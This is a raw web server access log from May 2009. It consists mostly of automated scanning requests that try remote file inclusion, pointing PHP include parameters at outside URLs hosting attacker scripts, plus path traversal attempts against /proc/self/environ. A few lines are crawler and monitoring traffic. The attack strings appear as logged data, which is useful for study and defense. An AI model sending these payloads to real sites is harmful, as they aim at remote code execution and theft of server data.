213.246.62.35 - - [23/May/2009:00:38:37 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:00:38:50 -0400] "GET /logs/error_log.Q108062900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:00:38:50 -0400] "GET //modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:00:38:52 -0400] "GET /logs//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
212.150.52.114 - - [23/May/2009:00:38:53 -0400] "GET /logs/access_log.Q109051000%20%20//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:00:38:54 -0400] "GET /logs/error_log.Q109042900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
72.30.142.171 - - [23/May/2009:00:38:57 -0400] "GET /logs/access_log.Q108033000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.146.68.61 - - [23/May/2009:00:39:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:01 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:01 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:39:04 -0400] "GET /logs/access_log.Q109051000%20%20//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:00:39:05 -0400] "GET /logs/error_log.Q108062900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
62.146.68.61 - - [23/May/2009:00:39:05 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:05 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:05 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:05 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:00:39:05 -0400] "GET //modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
62.146.68.61 - - [23/May/2009:00:39:05 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:00:39:05 -0400] "GET /logs//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:00:39:07 -0400] "GET /logs/error_log.Q109042900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
62.146.68.61 - - [23/May/2009:00:39:07 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:07 -0400] "GET /logs/access_log.Q108051700%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:07 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:08 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:08 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:08 -0400] "GET /logs/access_log.Q108051700%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:39:40 -0400] "GET /logs/access_log.Q108052600//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:51 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:39:52 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:40:01 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:40:01 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:40:16 -0400] "GET /logs//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:40:16 -0400] "GET //include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:00:40:17 -0400] "GET /logs/access_log.Q109010700//includes/messages.inc.php?include_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:00:40:17 -0400] "GET //includes/messages.inc.php?include_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:00:40:18 -0400] "GET /logs//includes/messages.inc.php?include_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
212.150.52.114 - - [23/May/2009:00:40:19 -0400] "GET /logs//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:40:19 -0400] "GET //include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:40:25 -0400] "GET /logs/access_log.Q109013000//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:40:40 -0400] "GET /logs/access_log.Q109051000%20%20//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:40:40 -0400] "GET /logs/access_log.Q109051000%20%20//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:00:40:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [23/May/2009:00:41:02 -0400] "GET /include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:41:02 -0400] "GET /logs/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:41:06 -0400] "GET /logs/access_log.Q108051700/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:41:59 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:41:59 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:41:59 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:42:04 -0400] "GET /include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:42:05 -0400] "GET /logs/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:42:05 -0400] "GET /logs/access_log.Q108051700/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:42:33 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:42:39 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:53 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:54 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:54 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:54 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:59 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:59 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:42:59 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:09 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:09 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:09 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:43:11 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:43:11 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:43:12 -0400] "GET /logs/access_log.Q108052600//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:15 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:15 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:15 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:00:43:21 -0400] "GET /include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:00:43:34 -0400] "GET /logs/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:00:43:34 -0400] "GET /logs/access_log.Q108051700/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:43:35 -0400] "GET /logs/access_log.Q109013000//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:47 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:49 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:43:54 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:44:00 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.136.20.55 - - [23/May/2009:00:44:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
69.136.20.55 - - [23/May/2009:00:44:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
201.232.54.48 - - [23/May/2009:00:44:20 -0400] "GET /logs/access_log.Q108051700%20%20/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:44:20 -0400] "GET /logs/access_log.Q109051000//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:00:44:21 -0400] "GET /logs/access_log.Q109013000/index.php?pagina=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.136.20.55 - - [23/May/2009:00:44:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
69.136.20.55 - - [23/May/2009:00:44:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
66.175.122.228 - - [23/May/2009:00:44:29 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:44:32 -0400] "GET /logs/access_log.Q109051000//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:00:44:49 -0400] "GET /logs/error_log.Q109010700//includes/messages.inc.php?include_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.232.54.48 - - [23/May/2009:00:44:53 -0400] "GET /logs/access_log.Q109051100%20%20/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:00 -0400] "GET /?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:00 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:00 -0400] "GET /logs/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:05 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:08 -0400] "GET /logs/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:08 -0400] "GET /?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:08 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:45:12 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:00:45:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [23/May/2009:00:45:59 -0400] "GET /?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:00:45:59 -0400] "GET /logs/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:00:45:59 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:00:46:04 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:46:08 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:46:10 -0400] "GET /logs/access_log.Q108051700%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:46:11 -0400] "GET /logs/access_log.Q109050700%20%20//include/index.inc.php?site_path=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:46:20 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:46:39 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:46:41 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:00:46:51 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:47:31 -0400] "GET /logs/access_log.Q108051700%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:47:47 -0400] "GET /logs/access_log.Q109051000//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.146.68.61 - - [23/May/2009:00:48:06 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:00:48:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444A31F50030BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [23/May/2009:00:48:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444AA1250035BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [23/May/2009:00:48:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2088064449E1850030BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [23/May/2009:00:48:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444A81650031BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.151.233.72 - - [23/May/2009:00:50:09 -0400] "GET /logs/access_log.Q108052400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.202.4.158 - - [23/May/2009:00:50:43 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
91.202.4.158 - - [23/May/2009:00:50:43 -0400] "GET /logs/access_log.Q108111500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
91.202.4.158 - - [23/May/2009:00:50:43 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
91.202.4.158 - - [23/May/2009:00:50:43 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
91.202.4.158 - - [23/May/2009:00:50:43 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
91.202.4.158 - - [23/May/2009:00:50:43 -0400] "GET /logs/access_log.Q108111500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
209.59.12.99 - - [23/May/2009:00:50:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.202.4.158 - - [23/May/2009:00:51:34 -0400] "GET /logs/error_log.Q109050400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
91.202.4.158 - - [23/May/2009:00:51:35 -0400] "GET /logs/error_log.Q109050400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
211.241.40.51 - - [23/May/2009:00:53:42 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:00:53:43 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
